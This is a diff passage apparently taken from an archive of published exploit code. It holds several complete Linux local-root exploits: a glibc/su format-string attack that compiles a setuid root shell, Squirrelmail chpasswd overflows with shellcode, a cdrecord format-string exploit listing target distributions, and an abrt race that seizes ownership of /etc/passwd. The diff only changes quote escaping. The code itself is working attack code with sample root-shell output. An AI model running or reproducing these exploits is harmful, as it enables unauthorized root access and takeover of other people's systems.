printf(\"failed to put mode 4777 to /tmp/xp\\naborting\\n\");
|
||||
printf("failed to put mode 4777 to /tmp/xp\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf(\" - Entering rootshell ;-) -\\n\");
|
||||
printf(" - Entering rootshell ;-) -\n");
|
||||
fflush(stdout);
|
||||
|
||||
if (!(pid = fork())) {
|
||||
args2[0] = \"/tmp/xp\";
|
||||
args2[0] = "/tmp/xp";
|
||||
args2[1] = NULL;
|
||||
execve(args2[0], args2, NULL);
|
||||
printf(\"failed to exec /tmp/xp\\n\");
|
||||
printf("failed to exec /tmp/xp\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (pid < 0) {
|
||||
perror(\"fork()\");
|
||||
perror("fork()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
waitpid(pid, &c, 0);
|
||||
|
||||
printf(\"Phase 7. Cleaning enviroment\\n\");
|
||||
sprintf(execbuf, \"rm -rf %s /tmp/xp\", LC_MESSAGES);
|
||||
printf("Phase 7. Cleaning enviroment\n");
|
||||
sprintf(execbuf, "rm -rf %s /tmp/xp", LC_MESSAGES);
|
||||
system(execbuf);
|
||||
}
|
||||
|
||||
|
@ -254,17 +254,17 @@ char *make_format_string(unsigned long sh_addr, int eat, int test)
|
|||
|
||||
memset(ret, 0, 0xffff);
|
||||
|
||||
for (c = 0; c < eat; c++) strcat(ret, \"%8x\");
|
||||
for (c = 0; c < eat; c++) strcat(ret, "%8x");
|
||||
|
||||
waste = 8 * eat;
|
||||
|
||||
hi = (sh_addr & 0xffff0000) >> 16;
|
||||
lo = (sh_addr & 0xffff) - hi;
|
||||
if (!test) {
|
||||
sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", hi-waste);
|
||||
sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", lo);
|
||||
sprintf(&ret[strlen(ret)], "%%0%ux%%hn", hi-waste);
|
||||
sprintf(&ret[strlen(ret)], "%%0%ux%%hn", lo);
|
||||
}
|
||||
else strcat(ret, \"%8x *0x%08x* %8x *0x%08x*\");
|
||||
else strcat(ret, "%8x *0x%08x* %8x *0x%08x*");
|
||||
return ret;
|
||||
}
|
||||
|
||||
|
@ -276,22 +276,22 @@ unsigned long get_dtors_addr()
|
|||
FILE *f;
|
||||
unsigned long ret = 0, tmp1, tmp2, tmp3;
|
||||
|
||||
sprintf(file, \"/tmp/tmprand%i\", rand());
|
||||
sprintf(exec_buf, \"%s -h /bin/su > %s\", objdump, file);
|
||||
sprintf(file, "/tmp/tmprand%i", rand());
|
||||
sprintf(exec_buf, "%s -h /bin/su > %s", objdump, file);
|
||||
|
||||
system(exec_buf);
|
||||
|
||||
f = fopen(file, \"r\");
|
||||
f = fopen(file, "r");
|
||||
if (!f) {
|
||||
perror(\"fopen()\");
|
||||
perror("fopen()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
while (!feof(f)) {
|
||||
fgets(buf, 1024, f);
|
||||
sscanf(buf, \" %i .%s %x %x \\n\", &tmp1, sect, &tmp2, &tmp3);
|
||||
printf(\".\"); fflush(stdout);
|
||||
if (strcmp(sect, \"dtors\")) continue;
|
||||
sscanf(buf, " %i .%s %x %x \n", &tmp1, sect, &tmp2, &tmp3);
|
||||
printf("."); fflush(stdout);
|
||||
if (strcmp(sect, "dtors")) continue;
|
||||
ret = tmp3;
|
||||
break;
|
||||
}
|
||||
|
@ -299,7 +299,7 @@ unsigned long get_dtors_addr()
|
|||
unlink(file);
|
||||
|
||||
if (!ret) {
|
||||
printf(\"error getting the address of .dtors\\naborting\");
|
||||
printf("error getting the address of .dtors\naborting");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -344,41 +344,41 @@ void calculate_eat_space(int *eatr, int *padr)
|
|||
char *readbuf = NULL, *token;
|
||||
unsigned long t1, t2;
|
||||
|
||||
tmpfile[0] = \'\\0\';
|
||||
tmpfile[0] = '\0';
|
||||
|
||||
nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1);
|
||||
if (!nop_env) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1);
|
||||
sprintf(&nop_env[NOP_LEN], \"%s\", shellcode);
|
||||
sprintf(&nop_env[NOP_LEN], "%s", shellcode);
|
||||
|
||||
for (eat = 50; eat < 200; eat++) {
|
||||
for (pad = 0; pad < 4; pad++) {
|
||||
|
||||
if (tmpfile[0]) unlink(tmpfile);
|
||||
|
||||
chdir(\"/\");
|
||||
chdir("/");
|
||||
|
||||
sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES);
|
||||
sprintf(execbuf, "rm -rf %s", LC_MESSAGES);
|
||||
system(execbuf);
|
||||
|
||||
mkdir(LC_MESSAGES, 0755);
|
||||
chdir(LC_MESSAGES);
|
||||
|
||||
f = fopen(\"libc.po\", \"w+\");
|
||||
f = fopen("libc.po", "w+");
|
||||
if (!f) {
|
||||
perror(\"fopen()\");
|
||||
perror("fopen()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\");
|
||||
fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(0xbfffffbb, eat,
|
||||
fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n");
|
||||
fprintf(f,"msgstr \"%s\\n\"", make_format_string(0xbfffffbb, eat,
|
||||
1));
|
||||
fclose(f);
|
||||
|
||||
sprintf(execbuf, \"chmod 777 libc.po; %s libc.po -o libc.mo\",
|
||||
sprintf(execbuf, "chmod 777 libc.po; %s libc.po -o libc.mo",
|
||||
msgfmt);
|
||||
system(execbuf);
|
||||
|
||||
|
@ -396,10 +396,10 @@ dup2(fds[1], 2);
|
|||
env[0] = language;
|
||||
env[1] = NULL;
|
||||
|
||||
args[0] = \"/bin/su\";
|
||||
args[1] = \"-\";
|
||||
args[0] = "/bin/su";
|
||||
args[1] = "-";
|
||||
args[2] = make_ret_str(test_value, pad);
|
||||
args[3] = \"-w\";
|
||||
args[3] = "-w";
|
||||
args[4] = nop_env;
|
||||
args[5] = NULL;
|
||||
|
||||
|
@ -407,16 +407,16 @@ execve(args[0], args, env);
|
|||
}
|
||||
|
||||
if (pid < 0) {
|
||||
perror(\"fork()\");
|
||||
perror("fork()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
close(fds[1]);
|
||||
|
||||
sprintf(tmpfile, \"/tmp/tmprand%i\", rand());
|
||||
sprintf(tmpfile, "/tmp/tmprand%i", rand());
|
||||
tmpfd = open(tmpfile, O_RDWR | O_CREAT);
|
||||
if (tmpfd < 0) {
|
||||
perror(\"open()\");
|
||||
perror("open()");
|
||||
exit(0);
|
||||
}
|
||||
while ((l = read(fds[0], buf, 1024)) > 0)
|
||||
|
@ -429,16 +429,16 @@ write(tmpfd, buf, l);
|
|||
|
||||
chmod(tmpfile, 0777);
|
||||
|
||||
f = fopen(tmpfile, \"r\");
|
||||
f = fopen(tmpfile, "r");
|
||||
if (!f) {
|
||||
perror(\"fopen()\");
|
||||
perror("fopen()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (readbuf) free(readbuf);
|
||||
readbuf = (char*) malloc(st.st_size);
|
||||
if (!readbuf) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -447,15 +447,15 @@ exit(0);
|
|||
fread(readbuf, 1, st.st_size, f);
|
||||
fclose(f);
|
||||
|
||||
token = strtok(readbuf, \"*\");
|
||||
token = strtok(readbuf, "*");
|
||||
if (!token) continue;
|
||||
token = strtok(NULL, \"*\");
|
||||
token = strtok(NULL, "*");
|
||||
if (!token) continue;
|
||||
|
||||
t1 = strtoul(token, NULL, 16);
|
||||
token = strtok(NULL, \"*\");
|
||||
token = strtok(NULL, "*");
|
||||
if (!token) continue;
|
||||
token = strtok(NULL, \"*\");
|
||||
token = strtok(NULL, "*");
|
||||
if (!token) continue;
|
||||
t2 = strtoul(token, NULL, 16);
|
||||
|
||||
|
@ -463,7 +463,7 @@ exit(0);
|
|||
if (t1 == (test_value+2)) {
|
||||
*eatr = eat;
|
||||
*padr = pad;
|
||||
sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES);
|
||||
sprintf(execbuf, "rm -rf %s", LC_MESSAGES);
|
||||
system(execbuf);
|
||||
if (tmpfile[0]) unlink(tmpfile);
|
||||
return;
|
||||
|
@ -471,16 +471,16 @@ if (t1 == (test_value+2)) {
|
|||
|
||||
// sleep(10);
|
||||
}
|
||||
printf(\".\");
|
||||
printf(".");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
if (tmpfile[0]) unlink(tmpfile);
|
||||
sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES);
|
||||
sprintf(execbuf, "rm -rf %s", LC_MESSAGES);
|
||||
system(execbuf);
|
||||
|
||||
printf(\"failed to calculate eat and pad values. glibc patched or
|
||||
invalid language?\\naborting\\n\");
|
||||
printf("failed to calculate eat and pad values. glibc patched or
|
||||
invalid language?\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -489,11 +489,11 @@ void checkfor(char *p)
|
|||
int fd;
|
||||
fd = open(p, O_RDONLY);
|
||||
if (fd < 0) {
|
||||
printf(\"failed\\naborting\\n\");
|
||||
printf("failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
close(fd);
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
|
@ -502,30 +502,30 @@ void make_suid_shell()
|
|||
FILE *f;
|
||||
char execbuf[1024];
|
||||
|
||||
f = fopen(\"/tmp/kidd0.c\", \"w\");
|
||||
f = fopen("/tmp/kidd0.c", "w");
|
||||
if (!f) {
|
||||
printf(\" failed to create /tmp/kidd0.c\\naborting\\n\");
|
||||
printf(" failed to create /tmp/kidd0.c\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fprintf(f, \"int main() { setuid(0); setgid(0); system(\\\"/bin/sh\\\");
|
||||
}\");
|
||||
fprintf(f, "int main() { setuid(0); setgid(0); system(\"/bin/sh\");
|
||||
}");
|
||||
fclose(f);
|
||||
|
||||
sprintf(execbuf, \"gcc /tmp/kidd0.c -o /tmp/xp\");
|
||||
sprintf(execbuf, "gcc /tmp/kidd0.c -o /tmp/xp");
|
||||
system(execbuf);
|
||||
|
||||
sprintf(execbuf, \"rm -f /tmp/kidd0.c\");
|
||||
sprintf(execbuf, "rm -f /tmp/kidd0.c");
|
||||
system(execbuf);
|
||||
|
||||
f = fopen(\"/tmp/xp\", \"r\");
|
||||
f = fopen("/tmp/xp", "r");
|
||||
if (!f) {
|
||||
printf(\" failed to compile /tmp/kidd0.c\\naborting\\n\");
|
||||
printf(" failed to compile /tmp/kidd0.c\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
fclose(f);
|
||||
|
||||
printf(\" /tmp/xp created Ok\\n\");
|
||||
printf(" /tmp/xp created Ok\n");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
|
@ -534,30 +534,30 @@ void search_valid_language()
|
|||
DIR *locale;
|
||||
struct dirent *dentry;
|
||||
|
||||
locale = opendir(\"/usr/share/locale\");
|
||||
locale = opendir("/usr/share/locale");
|
||||
if (!locale) {
|
||||
perror(\"failed to opendir /usr/share/locale\");
|
||||
printf(\"aborting\\n\");
|
||||
perror("failed to opendir /usr/share/locale");
|
||||
printf("aborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
while (dentry = readdir(locale)) {
|
||||
|
||||
if (!strchr(dentry->d_name, \'_\')) continue;
|
||||
if (!strchr(dentry->d_name, '_')) continue;
|
||||
|
||||
language = (char*) malloc(40 + strlen(dentry->d_name));
|
||||
if (!language) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(language, 0, 40 + strlen(dentry->d_name));
|
||||
sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\",dentry->d_name);
|
||||
sprintf(language, "LANGUAGE=%s/../../../../../../tmp",dentry->d_name);
|
||||
closedir(locale);
|
||||
printf(\" [using %s] \", dentry->d_name);
|
||||
printf(" [using %s] ", dentry->d_name);
|
||||
return;
|
||||
}
|
||||
|
||||
printf(\"failed to find a valid language\\naborting\\n\");
|
||||
printf("failed to find a valid language\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
|
|
@ -15,10 +15,10 @@
|
|||
#include <stdlib.h>
|
||||
|
||||
char shellcode[]=
|
||||
\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\xeb\\x16\\x5b\\x31\\xc0\"
|
||||
\"\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\"
|
||||
\"\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\"
|
||||
\"\\x68\";
|
||||
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
|
||||
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
|
||||
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
|
||||
"\x68";
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
|
@ -29,16 +29,16 @@ char *buffer, *ptr;
|
|||
|
||||
buffer = malloc(200);
|
||||
|
||||
printf(\"\\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\\n\\n\");
|
||||
printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n");
|
||||
|
||||
if(argc != 2) {
|
||||
printf(\"Usage: %s <path-to-chpasswd>\\n\\n\",argv[0]);
|
||||
printf("Usage: %s <path-to-chpasswd>\n\n",argv[0]);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);
|
||||
|
||||
// printf(\"Using ret = 0x%x\\n\\n\", ret);
|
||||
// printf("Using ret = 0x%x\n\n", ret);
|
||||
|
||||
ptr = buffer;
|
||||
addr_ptr = (long *) ptr;
|
||||
|
@ -49,7 +49,7 @@ for(i=0; i < 200; i+=4)
|
|||
|
||||
buffer[200-1] = 0;
|
||||
|
||||
execle(argv[1], \"chpasswd\", buffer, \"0x314\", \"m0s\", 0, env);
|
||||
execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env);
|
||||
|
||||
free(buffer);
|
||||
|
||||
|
|
|
@ -9,25 +9,25 @@
|
|||
# Cdrecord 2.0 (i586-mandrake-linux-gnu)
|
||||
#
|
||||
# scsibus: -1 target: -1 lun: -1
|
||||
# Warning: Open by \'devname\' is unintentional and not supported.
|
||||
# /usr/bin/cdrecord: No such file or directory. Cannot open \'. Cannot open SCSI driver.
|
||||
# /usr/bin/cdrecord: For possible targets try \'cdrecord -scanbus\'. Make sure you are root.
|
||||
# /usr/bin/cdrecord: For possible transport specifiers try \'cdrecord dev=help\'.
|
||||
# Warning: Open by 'devname' is unintentional and not supported.
|
||||
# /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver.
|
||||
# /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.
|
||||
# /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'.
|
||||
# sh-2.05b# id
|
||||
# uid=0(root) gid=0(root) groups=503(wsxz)
|
||||
# sh-2.05b#
|
||||
#####################################################
|
||||
|
||||
$shellcode =
|
||||
\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\".#setuid 0
|
||||
\"\\x31\\xdb\\x89\\xd8\\xb0\\x2e\\xcd\\x80\".#setgid 0
|
||||
\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\".
|
||||
\"\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\".
|
||||
\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\".
|
||||
\"\\xff\\xff/bin/sh\";
|
||||
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
|
||||
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
|
||||
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
|
||||
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
|
||||
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
|
||||
"\xff\xff/bin/sh";
|
||||
|
||||
$cdrecordpath = \"/usr/bin/cdrecord\";
|
||||
$nop = \"\\x90\"; # x86 NOP
|
||||
$cdrecordpath = "/usr/bin/cdrecord";
|
||||
$nop = "\x90"; # x86 NOP
|
||||
$offset = 0; # Default offset to try.
|
||||
|
||||
|
||||
|
@ -35,45 +35,45 @@
|
|||
$target = $ARGV[0];
|
||||
$offset = $ARGV[1];
|
||||
}else{
|
||||
printf(\" Priv8security.com Cdrecord local root exploit!!\\n\");
|
||||
printf(\" usage: $0 target\\n\");
|
||||
printf(\" List of targets:\\n\");
|
||||
printf(\" 1 - Linux Mandrake 8.2 Cdrecord 1.11a15\\n\");
|
||||
printf(\" 2 - Linux Mandrake 9.0 Cdrecord 1.11a32\\n\");
|
||||
printf(\" 3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\\n\");
|
||||
printf(\" 4 - Linux Mandrake 9.1 Cdrecord 2.0\\n\");
|
||||
printf(" Priv8security.com Cdrecord local root exploit!!\n");
|
||||
printf(" usage: $0 target\n");
|
||||
printf(" List of targets:\n");
|
||||
printf(" 1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n");
|
||||
printf(" 2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n");
|
||||
printf(" 3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n");
|
||||
printf(" 4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ( $target eq \"1\" ) {
|
||||
if ( $target eq "1" ) {
|
||||
$retword = 0x0807af38; #Mr .dtors ;)
|
||||
$fmtstring = \"%.134727238x%x%x%x%x%x%x%x%x%n:\";
|
||||
$fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
|
||||
}
|
||||
if ( $target eq \"2\" ) {
|
||||
if ( $target eq "2" ) {
|
||||
# $retword = 0x08084578; #.dtors
|
||||
$retword = 0x08084684; #.GOT exit
|
||||
$fmtstring = \"%.134769064x%x%x%x%x%x%x%x%x%n:\";
|
||||
$fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
|
||||
}
|
||||
if ( $target eq \"3\" ) {
|
||||
if ( $target eq "3" ) {
|
||||
$retword = 0x0807f658;
|
||||
$fmtstring = \"%.134745456x%x%x%x%x%x%x%x%x%x%x%n:\";
|
||||
$fmtstring = "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
|
||||
}
|
||||
if ( $target eq \"4\" ) {
|
||||
if ( $target eq "4" ) {
|
||||
$retword = 0x0808c82c; #.GOT exit
|
||||
$fmtstring = \"%.134802669x%x%x%x%x%x%x%x%x%n:\";
|
||||
$fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
|
||||
}
|
||||
|
||||
printf(\"Using target number %d\\n\", $target);
|
||||
printf(\"Using Mr .dtors 0x%x\\n\",$retword);
|
||||
printf("Using target number %d\n", $target);
|
||||
printf("Using Mr .dtors 0x%x\n",$retword);
|
||||
|
||||
$new_retword = pack(\'l\', ($retword));
|
||||
$new_retshell = pack(\'l\', ($retshell));
|
||||
$new_retword = pack('l', ($retword));
|
||||
$new_retshell = pack('l', ($retshell));
|
||||
$buffer2 = $new_retword;
|
||||
$buffer2 .= $nop x 150;
|
||||
$buffer2 .= $shellcode;
|
||||
$buffer2 .= $fmtstring;
|
||||
|
||||
exec(\"$cdrecordpath dev=\'$buffer2\' \'$cdrecordpath\'\");
|
||||
exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");
|
||||
|
||||
|
||||
# milw0rm.com [2003-05-14]
|
||||
|
|
|
@ -26,19 +26,19 @@
|
|||
// $ ./a.out /etc/passwd
|
||||
// [ wait a few minutes ]
|
||||
// Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race...
|
||||
// Didn\'t win, trying again!
|
||||
// Didn't win, trying again!
|
||||
// Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race...
|
||||
// Didn\'t win, trying again!
|
||||
// Didn't win, trying again!
|
||||
// Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race...
|
||||
// Didn\'t win, trying again!
|
||||
// Didn't win, trying again!
|
||||
// Detected ccpp-2015-04-13-21:54:43-14195.new, attempting to race...
|
||||
// Didn\'t win, trying again!
|
||||
// Didn't win, trying again!
|
||||
// Detected ccpp-2015-04-13-21:54:43-14198.new, attempting to race...
|
||||
// Exploit successful...
|
||||
// -rw-r--r--. 1 taviso abrt 1751 Sep 26 2014 /etc/passwd
|
||||
//
|
||||
|
||||
static const char kAbrtPrefix[] = \"/var/tmp/abrt/\";
|
||||
static const char kAbrtPrefix[] = "/var/tmp/abrt/";
|
||||
static const size_t kMaxEventBuf = 8192;
|
||||
static const size_t kUnlinkAttempts = 8192 * 2;
|
||||
static const int kCrashDelay = 10000;
|
||||
|
@ -57,27 +57,27 @@ int main(int argc, char **argv)
|
|||
|
||||
// First argument is the filename user wants us to chown().
|
||||
if (argc != 2) {
|
||||
errx(EXIT_FAILURE, \"please specify filename to chown (e.g. /etc/passwd)\");
|
||||
errx(EXIT_FAILURE, "please specify filename to chown (e.g. /etc/passwd)");
|
||||
}
|
||||
|
||||
// This is required as we need to make different comm names to avoid
|
||||
// triggering abrt rate limiting, so we fork()/execve() different names.
|
||||
if (strcmp(argv[1], \"crash\") == 0) {
|
||||
if (strcmp(argv[1], "crash") == 0) {
|
||||
__builtin_trap();
|
||||
}
|
||||
|
||||
// Setup inotify, and add a watch on the abrt directory.
|
||||
if ((fd = inotify_init()) < 0) {
|
||||
err(EXIT_FAILURE, \"unable to initialize inotify\");
|
||||
err(EXIT_FAILURE, "unable to initialize inotify");
|
||||
}
|
||||
|
||||
if ((watch = inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)) < 0) {
|
||||
err(EXIT_FAILURE, \"failed to create new watch descriptor\");
|
||||
err(EXIT_FAILURE, "failed to create new watch descriptor");
|
||||
}
|
||||
|
||||
// Start causing crashes so that abrt generates reports.
|
||||
if ((child = create_abrt_events(*argv)) == -1) {
|
||||
err(EXIT_FAILURE, \"failed to generate abrt reports\");
|
||||
err(EXIT_FAILURE, "failed to generate abrt reports");
|
||||
}
|
||||
|
||||
// Now start processing inotify events.
|
||||
|
@ -90,7 +90,7 @@ int main(int argc, char **argv)
|
|||
char command[1024];
|
||||
|
||||
// If this is a new ccpp report, we can start trying to race it.
|
||||
if (strncmp(ev->name, \"ccpp\", 4) != 0) {
|
||||
if (strncmp(ev->name, "ccpp", 4) != 0) {
|
||||
continue;
|
||||
}
|
||||
|
||||
|
@ -99,9 +99,9 @@ int main(int argc, char **argv)
|
|||
strncat(dirname, ev->name, sizeof dirname);
|
||||
|
||||
strncpy(mapsname, dirname, sizeof dirname);
|
||||
strncat(mapsname, \"/maps\", sizeof mapsname);
|
||||
strncat(mapsname, "/maps", sizeof mapsname);
|
||||
|
||||
fprintf(stderr, \"Detected %s, attempting to race...\\n\", ev->name);
|
||||
fprintf(stderr, "Detected %s, attempting to race...\n", ev->name);
|
||||
|
||||
// Check if we need to wait for the next event or not.
|
||||
while (access(dirname, F_OK) == 0) {
|
||||
|
@ -117,7 +117,7 @@ int main(int argc, char **argv)
|
|||
break;
|
||||
}
|
||||
|
||||
// This looks good, but doesn\'t mean we won, it\'s possible
|
||||
// This looks good, but doesn't mean we won, it's possible
|
||||
// chown() might have happened while the file was unlinked.
|
||||
//
|
||||
// Give it a few microseconds to run chown()...just in case
|
||||
|
@ -125,31 +125,31 @@ int main(int argc, char **argv)
|
|||
usleep(10);
|
||||
|
||||
if (stat(argv[1], &statbuf) != 0) {
|
||||
errx(EXIT_FAILURE, \"unable to stat target file %s\", argv[1]);
|
||||
errx(EXIT_FAILURE, "unable to stat target file %s", argv[1]);
|
||||
}
|
||||
|
||||
if (statbuf.st_uid != getuid()) {
|
||||
break;
|
||||
}
|
||||
|
||||
fprintf(stderr, \"\\tExploit successful...\\n\");
|
||||
fprintf(stderr, "\tExploit successful...\n");
|
||||
|
||||
// We\'re the new owner, run ls -l to show user.
|
||||
sprintf(command, \"ls -l %s\", argv[1]);
|
||||
// We're the new owner, run ls -l to show user.
|
||||
sprintf(command, "ls -l %s", argv[1]);
|
||||
system(command);
|
||||
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
}
|
||||
|
||||
fprintf(stderr, \"\\tDidn\'t win, trying again!\\n\");
|
||||
fprintf(stderr, "\tDidn't win, trying again!\n");
|
||||
}
|
||||
}
|
||||
|
||||
err(EXIT_FAILURE, \"failed to read inotify event\");
|
||||
err(EXIT_FAILURE, "failed to read inotify event");
|
||||
}
|
||||
|
||||
// This routine attempts to generate new abrt events. We can\'t just crash,
|
||||
// This routine attempts to generate new abrt events. We can't just crash,
|
||||
// because abrt sanely tries to rate limit report creation, so we need a new
|
||||
// comm name for each crash.
|
||||
static pid_t create_abrt_events(const char *name)
|
||||
|
@ -169,35 +169,35 @@ static pid_t create_abrt_events(const char *name)
|
|||
// Choose a new unused filename
|
||||
newname = tmpnam(0);
|
||||
|
||||
// Make sure we\'re not too fast.
|
||||
// Make sure we're not too fast.
|
||||
usleep(kCrashDelay);
|
||||
|
||||
// Create a new crashing subprocess.
|
||||
if ((pid = fork()) == 0) {
|
||||
if (link(name, newname) != 0) {
|
||||
err(EXIT_FAILURE, \"failed to create a new exename\");
|
||||
err(EXIT_FAILURE, "failed to create a new exename");
|
||||
}
|
||||
|
||||
// Execute crashing process.
|
||||
execl(newname, newname, \"crash\", NULL);
|
||||
execl(newname, newname, "crash", NULL);
|
||||
|
||||
// This should always work.
|
||||
err(EXIT_FAILURE, \"unexpected execve failure\");
|
||||
err(EXIT_FAILURE, "unexpected execve failure");
|
||||
}
|
||||
|
||||
// Reap crashed subprocess.
|
||||
if (waitpid(pid, &status, 0) != pid) {
|
||||
err(EXIT_FAILURE, \"waitpid failure\");
|
||||
err(EXIT_FAILURE, "waitpid failure");
|
||||
}
|
||||
|
||||
// Clean up the temporary name.
|
||||
if (unlink(newname) != 0) {
|
||||
err(EXIT_FAILURE, \"failed to clean up\");
|
||||
err(EXIT_FAILURE, "failed to clean up");
|
||||
}
|
||||
|
||||
// Make sure it crashed as expected.
|
||||
if (!WIFSIGNALED(status)) {
|
||||
errx(EXIT_FAILURE, \"something went wrong\");
|
||||
errx(EXIT_FAILURE, "something went wrong");
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -30,17 +30,17 @@
|
|||
#include <sys/wait.h>
|
||||
|
||||
#define NOP 0x90
|
||||
#define Fuckpr0 \"./chpasswd\" /* you need modify it by yourself */
|
||||
#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */
|
||||
#define LOOP 2000 /* loop of bruteforce */
|
||||
|
||||
/* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */
|
||||
|
||||
char shellcode[] =\"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68\"
|
||||
\"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80\";
|
||||
char shellcode[] ="x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68"
|
||||
"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80";
|
||||
|
||||
unsigned long get_esp() {
|
||||
|
||||
__asm__ (\"movl %esp,%eax\");
|
||||
__asm__ ("movl %esp,%eax");
|
||||
|
||||
}
|
||||
|
||||
|
@ -52,7 +52,7 @@ value = malloc(size);
|
|||
|
||||
if(value == NULL){
|
||||
|
||||
printf(\"ERROR:virtual memory exhausted...n\");
|
||||
printf("ERROR:virtual memory exhausted...n");
|
||||
|
||||
exit(-1);
|
||||
|
||||
|
@ -74,16 +74,16 @@ pid_t pid;
|
|||
|
||||
ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode);
|
||||
|
||||
printf(\"t-------------------------------------------------------n\");
|
||||
printf(\"t Squirrelmail chpasswd local root bruteforce exploit n\");
|
||||
printf(\"t code By Bytes<Bytes[at]ph4nt0m.org> 2004 n\");
|
||||
printf(\"t http://www.ph4nt0m.net n\");
|
||||
printf(\"t#######################################################n\");
|
||||
printf("t-------------------------------------------------------n");
|
||||
printf("t Squirrelmail chpasswd local root bruteforce exploit n");
|
||||
printf("t code By Bytes<Bytes[at]ph4nt0m.org> 2004 n");
|
||||
printf("t http://www.ph4nt0m.net n");
|
||||
printf("t#######################################################n");
|
||||
|
||||
|
||||
sleep(1);
|
||||
|
||||
printf(\"[+] Bruteforce......nn\");
|
||||
printf("[+] Bruteforce......nn");
|
||||
|
||||
sleep(2);
|
||||
|
||||
|
@ -105,19 +105,19 @@ for(i=0; i < 150; i+=4){
|
|||
|
||||
}
|
||||
|
||||
